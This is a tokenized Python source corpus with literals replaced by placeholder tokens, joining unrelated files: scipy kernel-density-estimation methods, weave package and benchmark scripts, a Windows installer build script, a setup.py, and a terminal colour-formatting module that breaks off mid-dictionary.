"""<STR_LIT>""" <EOL> points = atleast_2d ( points ) <EOL> d , m = points . shape <EOL> if d != self . d : <EOL> if d == <NUM_LIT:1> and m == self . d : <EOL> points = reshape ( points , ( self . d , <NUM_LIT:1> ) ) <EOL> m = <NUM_LIT:1> <EOL> else : <EOL> msg = "<STR_LIT>" % ( d , <EOL> self . d ) <EOL> raise ValueError ( msg ) <EOL> result = zeros ( ( m , ) , dtype = float ) <EOL> if m >= self . n : <EOL> for i in range ( self . n ) : <EOL> diff = self . dataset [ : , i , newaxis ] - points <EOL> tdiff = dot ( self . inv_cov , diff ) <EOL> energy = sum ( diff * tdiff , axis = <NUM_LIT:0> ) / <NUM_LIT> <EOL> result = result + exp ( - energy ) <EOL> else : <EOL> for i in range ( m ) : <EOL> diff = self . dataset - points [ : , i , newaxis ] <EOL> tdiff = dot ( self . inv_cov , diff ) <EOL> energy = sum ( diff * tdiff , axis = <NUM_LIT:0> ) / <NUM_LIT> <EOL> result [ i ] = sum ( exp ( - energy ) , axis = <NUM_LIT:0> ) <EOL> result = result / self . _norm_factor <EOL> return result <EOL> __call__ = evaluate <EOL> def integrate_gaussian ( self , mean , cov ) : <EOL> """<STR_LIT>""" <EOL> mean = atleast_1d ( squeeze ( mean ) ) <EOL> cov = atleast_2d ( cov ) <EOL> if mean . shape != ( self . d , ) : <EOL> raise ValueError ( "<STR_LIT>" % self . d ) <EOL> if cov . shape != ( self . d , self . d ) : <EOL> raise ValueError ( "<STR_LIT>" % self . d ) <EOL> mean = mean [ : , newaxis ] <EOL> sum_cov = self . covariance + cov <EOL> sum_cov_chol = linalg . cho_factor ( sum_cov ) <EOL> diff = self . dataset - mean <EOL> tdiff = linalg . cho_solve ( sum_cov_chol , diff ) <EOL> sqrt_det = np . prod ( np . diagonal ( sum_cov_chol [ <NUM_LIT:0> ] ) ) <EOL> norm_const = power ( <NUM_LIT:2> * pi , sum_cov . shape [ <NUM_LIT:0> ] / <NUM_LIT> ) * sqrt_det <EOL> energies = sum ( diff * tdiff , axis = <NUM_LIT:0> ) / <NUM_LIT> <EOL> result = sum ( exp ( - energies ) , axis = <NUM_LIT:0> ) / norm_const / self . n <EOL> return result <EOL> def integrate_box_1d ( self , low , high ) : <EOL> """<STR_LIT>""" <EOL> if self . d != <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> stdev = ravel ( sqrt ( self . covariance ) ) [ <NUM_LIT:0> ] <EOL> normalized_low = ravel ( ( low - self . dataset ) / stdev ) <EOL> normalized_high = ravel ( ( high - self . dataset ) / stdev ) <EOL> value = np . mean ( special . ndtr ( normalized_high ) - <EOL> special . ndtr ( normalized_low ) ) <EOL> return value <EOL> def integrate_box ( self , low_bounds , high_bounds , maxpts = None ) : <EOL> """<STR_LIT>""" <EOL> if maxpts is not None : <EOL> extra_kwds = { '<STR_LIT>' : maxpts } <EOL> else : <EOL> extra_kwds = { } <EOL> value , inform = mvn . mvnun ( low_bounds , high_bounds , self . dataset , <EOL> self . covariance , ** extra_kwds ) <EOL> if inform : <EOL> msg = ( '<STR_LIT>' % <EOL> ( self . d * <NUM_LIT:1000> ) ) <EOL> warnings . warn ( msg ) <EOL> return value <EOL> def integrate_kde ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if other . d != self . d : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if other . n < self . n : <EOL> small = other <EOL> large = self <EOL> else : <EOL> small = self <EOL> large = other <EOL> sum_cov = small . covariance + large . covariance <EOL> sum_cov_chol = linalg . cho_factor ( sum_cov ) <EOL> result = <NUM_LIT:0.0> <EOL> for i in range ( small . n ) : <EOL> mean = small . dataset [ : , i , newaxis ] <EOL> diff = large . dataset - mean <EOL> tdiff = linalg . cho_solve ( sum_cov_chol , diff ) <EOL> energies = sum ( diff * tdiff , axis = <NUM_LIT:0> ) / <NUM_LIT> <EOL> result += sum ( exp ( - energies ) , axis = <NUM_LIT:0> ) <EOL> sqrt_det = np . prod ( np . diagonal ( sum_cov_chol [ <NUM_LIT:0> ] ) ) <EOL> norm_const = power ( <NUM_LIT:2> * pi , sum_cov . shape [ <NUM_LIT:0> ] / <NUM_LIT> ) * sqrt_det <EOL> result /= norm_const * large . n * small . n <EOL> return result <EOL> def resample ( self , size = None ) : <EOL> """<STR_LIT>""" <EOL> if size is None : <EOL> size = self . n <EOL> norm = transpose ( multivariate_normal ( zeros ( ( self . d , ) , float ) , <EOL> self . covariance , size = size ) ) <EOL> indices = randint ( <NUM_LIT:0> , self . n , size = size ) <EOL> means = self . dataset [ : , indices ] <EOL> return means + norm <EOL> def scotts_factor ( self ) : <EOL> return power ( self . n , - <NUM_LIT:1.> / ( self . d + <NUM_LIT:4> ) ) <EOL> def silverman_factor ( self ) : <EOL> return power ( self . n * ( self . d + <NUM_LIT> ) / <NUM_LIT> , - <NUM_LIT:1.> / ( self . d + <NUM_LIT:4> ) ) <EOL> covariance_factor = scotts_factor <EOL> covariance_factor . __doc__ = """<STR_LIT>""" <EOL> def set_bandwidth ( self , bw_method = None ) : <EOL> """<STR_LIT>""" <EOL> if bw_method is None : <EOL> pass <EOL> elif bw_method == '<STR_LIT>' : <EOL> self . covariance_factor = self . scotts_factor <EOL> elif bw_method == '<STR_LIT>' : <EOL> self . covariance_factor = self . silverman_factor <EOL> elif np . isscalar ( bw_method ) and not isinstance ( bw_method , string_types ) : <EOL> self . _bw_method = '<STR_LIT>' <EOL> self . covariance_factor = lambda : bw_method <EOL> elif callable ( bw_method ) : <EOL> self . _bw_method = bw_method <EOL> self . covariance_factor = lambda : self . _bw_method ( self ) <EOL> else : <EOL> msg = "<STR_LIT>" "<STR_LIT>" <EOL> raise ValueError ( msg ) <EOL> self . _compute_covariance ( ) <EOL> def _compute_covariance ( self ) : <EOL> """<STR_LIT>""" <EOL> self . factor = self . covariance_factor ( ) <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . _data_covariance = atleast_2d ( np . cov ( self . dataset , rowvar = <NUM_LIT:1> , <EOL> bias = False ) ) <EOL> self . _data_inv_cov = linalg . inv ( self . _data_covariance ) <EOL> self . covariance = self . _data_covariance * self . factor ** <NUM_LIT:2> <EOL> self . inv_cov = self . _data_inv_cov / self . factor ** <NUM_LIT:2> <EOL> self . _norm_factor = sqrt ( linalg . det ( <NUM_LIT:2> * pi * self . covariance ) ) * self . n <EOL> def pdf ( self , x ) : <EOL> """<STR_LIT>""" <EOL> return self . evaluate ( x ) <EOL> def logpdf ( self , x ) : <EOL> """<STR_LIT>""" <EOL> return np . log ( self . evaluate ( x ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , print_function <EOL> import sys <EOL> from numpy import deprecate <EOL> if sys . version_info [ <NUM_LIT:0> ] >= <NUM_LIT:3> : <EOL> raise ImportError ( "<STR_LIT>" ) <EOL> @ deprecate ( old_name = "<STR_LIT>" , new_name = "<STR_LIT>" ) <EOL> def _deprecated ( ) : <EOL> pass <EOL> try : <EOL> _deprecated ( ) <EOL> except DeprecationWarning as e : <EOL> pass <EOL> from . weave_version import weave_version as __version__ <EOL> try : <EOL> from . blitz_tools import blitz , BlitzWarning <EOL> except ImportError : <EOL> pass <EOL> from . inline_tools import inline <EOL> from . import ext_tools <EOL> from . ext_tools import ext_module , ext_function <EOL> try : <EOL> from . accelerate_tools import accelerate <EOL> except : <EOL> pass <EOL> from numpy . testing import Tester <EOL> test = Tester ( ) . test </s>
<s> from __future__ import absolute_import , print_function <EOL> import sys <EOL> sys . path . insert ( <NUM_LIT:0> , '<STR_LIT:..>' ) <EOL> import inline_tools <EOL> from types import * <EOL> def c_list_map ( func , seq ) : <EOL> """<STR_LIT>""" <EOL> assert ( type ( func ) in [ FunctionType , MethodType , type ( len ) ] ) <EOL> code = """<STR_LIT>""" <EOL> return inline_tools . inline ( code , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def c_list_map2 ( func , seq ) : <EOL> """<STR_LIT>""" <EOL> assert ( type ( func ) in [ FunctionType , MethodType , type ( len ) ] ) <EOL> code = """<STR_LIT>""" <EOL> return inline_tools . inline ( code , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def main ( ) : <EOL> seq = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> print ( '<STR_LIT>' , map ( len , seq ) ) <EOL> print ( '<STR_LIT>' , c_list_map ( len , seq ) ) <EOL> print ( '<STR_LIT>' , c_list_map2 ( len , seq ) ) <EOL> def time_it ( m , n ) : <EOL> import time <EOL> seq = [ '<STR_LIT>' ] * n <EOL> t1 = time . time ( ) <EOL> for i in range ( m ) : <EOL> result = map ( len , seq ) <EOL> t2 = time . time ( ) <EOL> py = t2 - t1 <EOL> print ( '<STR_LIT>' , py ) <EOL> result = c_list_map ( len , seq ) <EOL> t1 = time . time ( ) <EOL> for i in range ( m ) : <EOL> result = c_list_map ( len , seq ) <EOL> t2 = time . time ( ) <EOL> c = t2 - t1 <EOL> print ( '<STR_LIT>' , c ) <EOL> print ( '<STR_LIT>' , py / c ) <EOL> result = c_list_map2 ( len , seq ) <EOL> t1 = time . time ( ) <EOL> for i in range ( m ) : <EOL> result = c_list_map2 ( len , seq ) <EOL> t2 = time . time ( ) <EOL> c = t2 - t1 <EOL> print ( '<STR_LIT>' , c ) <EOL> print ( '<STR_LIT>' , py / c ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) <EOL> time_it ( <NUM_LIT:100> , <NUM_LIT:1000> ) </s>
<s> from __future__ import absolute_import , print_function <EOL> import time <EOL> from scipy import weave <EOL> force = <NUM_LIT:0> <EOL> N = <NUM_LIT> <EOL> def list_append_scxx ( a , Na ) : <EOL> code = """<STR_LIT>""" <EOL> weave . inline ( code , [ '<STR_LIT:a>' , '<STR_LIT>' ] , force = force , verbose = <NUM_LIT:2> , compiler = '<STR_LIT>' ) <EOL> def list_append_c ( a , Na ) : <EOL> code = """<STR_LIT>""" <EOL> weave . inline ( code , [ '<STR_LIT:a>' , '<STR_LIT>' ] , force = force , compiler = '<STR_LIT>' ) <EOL> def list_append_py ( a , Na ) : <EOL> for i in xrange ( Na ) : <EOL> a . append ( i ) <EOL> def time_list_append ( Na ) : <EOL> """<STR_LIT>""" <EOL> print ( '<STR_LIT>' , end = '<STR_LIT:U+0020>' ) <EOL> a = [ ] <EOL> t1 = time . time ( ) <EOL> list_append_c ( a , Na ) <EOL> t2 = time . time ( ) <EOL> print ( '<STR_LIT>' , t2 - t1 , '<STR_LIT>' ) <EOL> a = [ ] <EOL> t1 = time . time ( ) <EOL> list_append_c ( a , Na ) <EOL> t2 = time . time ( ) <EOL> print ( '<STR_LIT>' , t2 - t1 ) <EOL> a = [ ] <EOL> t1 = time . time ( ) <EOL> list_append_scxx ( a , Na ) <EOL> t2 = time . time ( ) <EOL> print ( '<STR_LIT>' , t2 - t1 ) <EOL> a = [ ] <EOL> t1 = time . time ( ) <EOL> list_append_c ( a , Na ) <EOL> t2 = time . time ( ) <EOL> print ( '<STR_LIT>' , t2 - t1 ) <EOL> def list_copy_scxx ( a , b ) : <EOL> code = """<STR_LIT>""" <EOL> weave . inline ( code , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] , force = force , verbose = <NUM_LIT:2> , compiler = '<STR_LIT>' ) <EOL> def list_copy_c ( a , b ) : <EOL> code = """<STR_LIT>""" <EOL> weave . inline ( code , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] , force = force , compiler = '<STR_LIT>' ) <EOL> def time_list_copy ( N ) : <EOL> """<STR_LIT>""" <EOL> print ( '<STR_LIT>' , end = '<STR_LIT:U+0020>' ) <EOL> a = [ <NUM_LIT:0> ] * N <EOL> b = [ <NUM_LIT:1> ] * N <EOL> t1 = time . time ( ) <EOL> list_copy_c ( a , b ) <EOL> t2 = time . time ( ) <EOL> print ( '<STR_LIT>' , t2 - t1 , '<STR_LIT>' ) <EOL> a = [ <NUM_LIT:0> ] * N <EOL> b = [ <NUM_LIT:1> ] * N <EOL> t1 = time . time ( ) <EOL> list_copy_c ( a , b ) <EOL> t2 = time . time ( ) <EOL> print ( '<STR_LIT>' , t2 - t1 ) <EOL> a = [ <NUM_LIT:0> ] * N <EOL> b = [ <NUM_LIT:1> ] * N <EOL> t1 = time . time ( ) <EOL> list_copy_scxx ( a , b ) <EOL> t2 = time . time ( ) <EOL> print ( '<STR_LIT>' , t2 - t1 ) <EOL> a = [ <NUM_LIT:0> ] * N <EOL> b = [ <NUM_LIT:1> ] * N <EOL> t1 = time . time ( ) <EOL> list_copy_c ( a , b ) <EOL> t2 = time . time ( ) <EOL> print ( '<STR_LIT>' , t2 - t1 ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> time_list_copy ( N ) </s>
<s> import os <EOL> from os . path import join as pjoin , normpath , exists as pexists , dirname <EOL> import subprocess <EOL> from shutil import rmtree , move as shmove <EOL> import re <EOL> from zipfile import ZipFile <EOL> from lib import get_svn_version , get_scipy_version <EOL> BUILD_MSI = False <EOL> SRC_ROOT = normpath ( pjoin ( os . getcwd ( ) , os . pardir , os . pardir , os . pardir ) ) <EOL> BUILD_ROOT = os . getcwd ( ) <EOL> PYVER = '<STR_LIT>' <EOL> ARCH = '<STR_LIT>' <EOL> PYEXECS = { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } <EOL> _SSE3_CFG = r"""<STR_LIT>""" <EOL> _SSE2_CFG = r"""<STR_LIT>""" <EOL> _NOSSE_CFG = r"""<STR_LIT>""" <EOL> SITECFG = { "<STR_LIT>" : _SSE2_CFG , "<STR_LIT>" : _SSE3_CFG , "<STR_LIT>" : _NOSSE_CFG } <EOL> options ( <EOL> clean = Bunch ( <EOL> src_dir = SRC_ROOT , <EOL> pyver = PYVER <EOL> ) , <EOL> clean_bootstrap = Bunch ( <EOL> src_dir = SRC_ROOT , <EOL> pyver = PYVER <EOL> ) , <EOL> build_sdist = Bunch ( <EOL> src_dir = SRC_ROOT <EOL> ) , <EOL> build_binary = Bunch ( <EOL> pyver = PYVER , <EOL> arch = ARCH , <EOL> src_root = SRC_ROOT <EOL> ) , <EOL> bootstrap = Bunch ( <EOL> pyver = PYVER , <EOL> src_root = SRC_ROOT <EOL> ) , <EOL> bootstrap_arch = Bunch ( <EOL> pyver = PYVER , <EOL> arch = ARCH <EOL> ) , <EOL> bootstrap_nsis = Bunch ( <EOL> pyver = PYVER , <EOL> src_root = SRC_ROOT <EOL> ) <EOL> ) <EOL> @ task <EOL> def clean ( ) : <EOL> raw_clean ( options . src_dir , options . pyver ) <EOL> @ task <EOL> def clean_bootstrap ( ) : <EOL> raw_clean_bootstrap ( options . pyver ) <EOL> @ task <EOL> def build_sdist ( ) : <EOL> raw_build_sdist ( options . src_dir ) <EOL> @ task <EOL> @ needs ( '<STR_LIT>' ) <EOL> def bootstrap ( ) : <EOL> raw_bootstrap ( options . pyver , options . src_dir ) <EOL> @ task <EOL> def bootstrap_arch ( ) : <EOL> pyver = options . pyver <EOL> arch = options . arch <EOL> set_bootstrap_sources ( arch , pyver ) <EOL> @ task <EOL> def bootstrap_nsis ( ) : <EOL> pyver = options . pyver <EOL> bdir = bootstrap_dir ( options . pyver ) <EOL> prepare_nsis_script ( bdir , pyver , get_scipy_version ( options . src_root ) ) <EOL> @ task <EOL> def build_binary ( ) : <EOL> pyver = options . pyver <EOL> arch = options . arch <EOL> raw_build_arch ( pyver , arch , options . src_root ) <EOL> @ task <EOL> @ needs ( '<STR_LIT>' ) <EOL> @ needs ( '<STR_LIT>' ) <EOL> def build_nsis ( ) : <EOL> scipy_verstr = get_scipy_version ( options . src_root ) <EOL> bdir = bootstrap_dir ( options . pyver ) <EOL> prepare_nsis_script ( bdir , options . pyver , scipy_verstr ) <EOL> for arch in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> raw_clean_bootstrap ( options . pyver ) <EOL> set_bootstrap_sources ( arch , options . pyver ) <EOL> raw_build_arch ( options . pyver , arch , options . src_root ) <EOL> raw_build_nsis ( options . pyver ) <EOL> def set_bootstrap_sources ( arch , pyver ) : <EOL> bdir = bootstrap_dir ( pyver ) <EOL> write_site_cfg ( arch , cwd = bdir ) <EOL> def get_sdist_tarball ( src_root ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" % get_scipy_version ( src_root ) <EOL> return name <EOL> def prepare_scipy_sources ( src_root , bootstrap ) : <EOL> zid = ZipFile ( pjoin ( src_root , '<STR_LIT>' , get_sdist_tarball ( src_root ) ) ) <EOL> root = '<STR_LIT>' % get_scipy_version ( src_root ) <EOL> for name in zid . namelist ( ) : <EOL> cnt = zid . read ( name ) <EOL> if name . startswith ( root ) : <EOL> name = name . split ( '<STR_LIT:/>' , <NUM_LIT:1> ) [ <NUM_LIT:1> ] <EOL> newname = pjoin ( bootstrap , name ) <EOL> if not pexists ( dirname ( newname ) ) : <EOL> os . makedirs ( dirname ( newname ) ) <EOL> fid = open ( newname , '<STR_LIT:wb>' ) <EOL> fid . write ( cnt ) <EOL> def prepare_nsis_script ( bdir , pyver , numver ) : <EOL> tpl = pjoin ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> source = open ( tpl , '<STR_LIT:r>' ) <EOL> target = open ( pjoin ( bdir , '<STR_LIT>' ) , '<STR_LIT:w>' ) <EOL> installer_name = '<STR_LIT>' % ( numver , pyver ) <EOL> cnt = "<STR_LIT>" . join ( source . readlines ( ) ) <EOL> cnt = cnt . replace ( '<STR_LIT>' , installer_name ) <EOL> for arch in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> cnt = cnt . replace ( '<STR_LIT>' % arch . upper ( ) , <EOL> get_binary_name ( arch , numver ) ) <EOL> target . write ( cnt ) <EOL> def bootstrap_dir ( pyver ) : <EOL> return pjoin ( BUILD_ROOT , "<STR_LIT>" % pyver ) <EOL> def get_python_exec ( ver ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return PYEXECS [ ver ] <EOL> except KeyError : <EOL> raise ValueError ( "<STR_LIT>" % ver ) <EOL> def write_site_cfg ( arch , cwd = None ) : <EOL> if not cwd : <EOL> cwd = os . getcwd ( ) <EOL> scfg = pjoin ( cwd , "<STR_LIT>" ) <EOL> if pexists ( scfg ) : <EOL> os . remove ( scfg ) <EOL> f = open ( scfg , '<STR_LIT:w>' ) <EOL> f . writelines ( SITECFG [ arch ] ) <EOL> f . close ( ) <EOL> def move_binary ( arch , pyver , cwd , scipy_verstr ) : <EOL> if not pexists ( pjoin ( cwd , "<STR_LIT>" ) ) : <EOL> os . makedirs ( pjoin ( cwd , "<STR_LIT>" ) ) <EOL> shmove ( pjoin ( cwd , '<STR_LIT>' , get_windist_exec ( pyver , scipy_verstr ) ) , <EOL> pjoin ( cwd , '<STR_LIT>' , get_binary_name ( arch , scipy_verstr ) ) ) <EOL> def get_binary_name ( arch , scipy_verstr ) : <EOL> if BUILD_MSI : <EOL> ext = '<STR_LIT>' <EOL> else : <EOL> ext = '<STR_LIT>' <EOL> return "<STR_LIT>" % ( scipy_verstr , arch , ext ) <EOL> def get_windist_exec ( pyver , scipy_verstr ) : <EOL> """<STR_LIT>""" <EOL> if BUILD_MSI : <EOL> ext = '<STR_LIT>' <EOL> else : <EOL> ext = '<STR_LIT>' <EOL> name = "<STR_LIT>" % ( scipy_verstr , pyver , ext ) <EOL> return name <EOL> def raw_clean ( src_dir , pyver ) : <EOL> sdir = pjoin ( src_dir , "<STR_LIT>" ) <EOL> if pexists ( sdir ) : <EOL> rmtree ( sdir ) <EOL> mani = pjoin ( src_dir , "<STR_LIT>" ) <EOL> if pexists ( mani ) : <EOL> os . remove ( mani ) <EOL> bdir = bootstrap_dir ( pyver ) <EOL> if pexists ( bdir ) : <EOL> rmtree ( bdir ) <EOL> def raw_clean_bootstrap ( pyver ) : <EOL> bdir = bootstrap_dir ( pyver ) <EOL> for d in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> if pexists ( pjoin ( bdir , d ) ) : <EOL> rmtree ( pjoin ( bdir , d ) ) <EOL> if pexists ( pjoin ( bdir , "<STR_LIT>" ) ) : <EOL> os . remove ( pjoin ( bdir , "<STR_LIT>" ) ) <EOL> def raw_build_sdist ( cwd ) : <EOL> cmd = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> build_log = "<STR_LIT>" <EOL> f = open ( build_log , '<STR_LIT:w>' ) <EOL> try : <EOL> try : <EOL> st = subprocess . call ( cmd , <EOL> stderr = subprocess . STDOUT , stdout = f , <EOL> cwd = cwd ) <EOL> if st : <EOL> raise RuntimeError ( "<STR_LIT>" % st ) <EOL> finally : <EOL> f . close ( ) <EOL> except ( subprocess . CalledProcessError , RuntimeError ) , e : <EOL> print e <EOL> msg = """<STR_LIT>""" % ( cmd , str ( e ) , build_log ) <EOL> raise Exception ( msg ) <EOL> def raw_bootstrap ( pyver , src_dir ) : <EOL> bdir = bootstrap_dir ( pyver ) <EOL> prepare_scipy_sources ( src_dir , bdir ) <EOL> def raw_build_arch ( pyver , arch , src_root ) : <EOL> scipy_verstr = get_scipy_version ( src_root ) <EOL> bdir = bootstrap_dir ( pyver ) <EOL> print "<STR_LIT>" % ( scipy_verstr , get_python_exec ( pyver ) , arch ) <EOL> if BUILD_MSI : <EOL> cmd = [ get_python_exec ( pyver ) , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:-c>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> else : <EOL> cmd = [ get_python_exec ( pyver ) , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:-c>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> build_log = "<STR_LIT>" % ( arch , pyver ) <EOL> f = open ( build_log , '<STR_LIT:w>' ) <EOL> try : <EOL> try : <EOL> st = subprocess . call ( cmd , <EOL> stderr = subprocess . STDOUT , stdout = f , <EOL> cwd = bdir ) <EOL> if st : <EOL> raise RuntimeError ( "<STR_LIT>" % st ) <EOL> finally : <EOL> f . close ( ) <EOL> except ( subprocess . CalledProcessError , RuntimeError ) , e : <EOL> print e <EOL> msg = """<STR_LIT>""" % ( cmd , str ( e ) , build_log ) <EOL> raise Exception ( msg ) <EOL> move_binary ( arch , pyver , bdir , scipy_verstr ) <EOL> def raw_build_nsis ( pyver ) : <EOL> bdir = bootstrap_dir ( options . pyver ) <EOL> st = subprocess . call ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> cwd = bdir ) <EOL> if st : <EOL> raise RuntimeError ( "<STR_LIT>" ) </s>
<s> import sys <EOL> try : <EOL> from setuptools import setup <EOL> have_setuptools = True <EOL> except ImportError : <EOL> from distutils . core import setup <EOL> have_setuptools = False <EOL> if sys . version_info [ <NUM_LIT:0> ] < <NUM_LIT:3> : <EOL> sys . exit ( "<STR_LIT>" ) <EOL> VERSION = "<STR_LIT>" <EOL> setup_kwargs = { <EOL> "<STR_LIT:version>" : VERSION + '<STR_LIT>' , <EOL> "<STR_LIT:description>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT:url>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : "<STR_LIT>" + VERSION , <EOL> "<STR_LIT>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : [ ( "<STR_LIT>" , [ '<STR_LIT>' , '<STR_LIT>' ] ) , ] , <EOL> } <EOL> if have_setuptools : <EOL> setup_kwargs [ '<STR_LIT>' ] = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> py_modules = [ '<STR_LIT>' ] , <EOL> entry_points = { '<STR_LIT>' : [ '<STR_LIT>' , ] , } , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> ** setup_kwargs <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> import string <EOL> from warnings import warn <EOL> RE_BACKGROUND = re . compile ( '<STR_LIT>' ) <EOL> def partial_color_format ( template , style = '<STR_LIT:default>' , cmap = None , hide = False ) : <EOL> """<STR_LIT>""" <EOL> if cmap is not None : <EOL> pass <EOL> elif style in STYLES : <EOL> cmap = STYLES [ style ] <EOL> else : <EOL> warn ( '<STR_LIT>' . format ( style ) , <EOL> RuntimeWarning ) <EOL> cmap = DEFAULT_STYLE <EOL> formatter = string . Formatter ( ) <EOL> esc = ( '<STR_LIT>' if hide else '<STR_LIT>' ) + '<STR_LIT>' <EOL> m = '<STR_LIT:m>' + ( '<STR_LIT>' if hide else '<STR_LIT>' ) <EOL> bopen = '<STR_LIT:{>' <EOL> bclose = '<STR_LIT:}>' <EOL> colon = '<STR_LIT::>' <EOL> expl = '<STR_LIT:!>' <EOL> toks = [ ] <EOL> for literal , field , spec , conv in formatter . parse ( template ) : <EOL> toks . append ( literal ) <EOL> if field is None : <EOL> pass <EOL> elif field in cmap : <EOL> toks . extend ( [ esc , cmap [ field ] , m ] ) <EOL> elif '<STR_LIT:#>' in field : <EOL> field = field . lower ( ) <EOL> pre , _ , post = field . partition ( '<STR_LIT:#>' ) <EOL> f_or_b = '<STR_LIT>' if RE_BACKGROUND . search ( pre ) is None else '<STR_LIT>' <EOL> rgb , _ , post = post . partition ( '<STR_LIT:_>' ) <EOL> c256 , _ = rgb_to_256 ( rgb ) <EOL> color = f_or_b + '<STR_LIT>' + c256 <EOL> mods = pre + '<STR_LIT:_>' + post <EOL> if '<STR_LIT>' in mods : <EOL> color = '<STR_LIT>' + color <EOL> if '<STR_LIT>' in mods : <EOL> color = '<STR_LIT>' + color <EOL> toks . extend ( [ esc , color , m ] ) <EOL> elif field is not None : <EOL> toks . append ( bopen ) <EOL> toks . append ( field ) <EOL> if conv is not None and len ( conv ) > <NUM_LIT:0> : <EOL> toks . append ( expl ) <EOL> toks . append ( conv ) <EOL> if spec is not None and len ( spec ) > <NUM_LIT:0> : <EOL> toks . append ( colon ) <EOL> toks . append ( spec ) <EOL> toks . append ( bclose ) <EOL> return '<STR_LIT>' . join ( toks ) <EOL> RGB_256 = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : 